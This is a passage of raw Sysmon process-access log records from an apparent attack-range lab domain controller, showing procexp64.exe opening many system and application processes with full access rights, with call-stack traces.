15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785823Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785822Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:56.362{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785943Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785942Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785941Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785940Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785939Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785938Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785937Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785936Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785935Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785934Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785933Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785932Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785931Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785930Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785929Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785928Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785927Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785926Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785925Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785924Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785923Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785922Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785921Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785920Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785919Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785918Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785917Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785916Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785915Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785914Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785913Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785912Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785911Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785910Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785909Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:57.393{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program 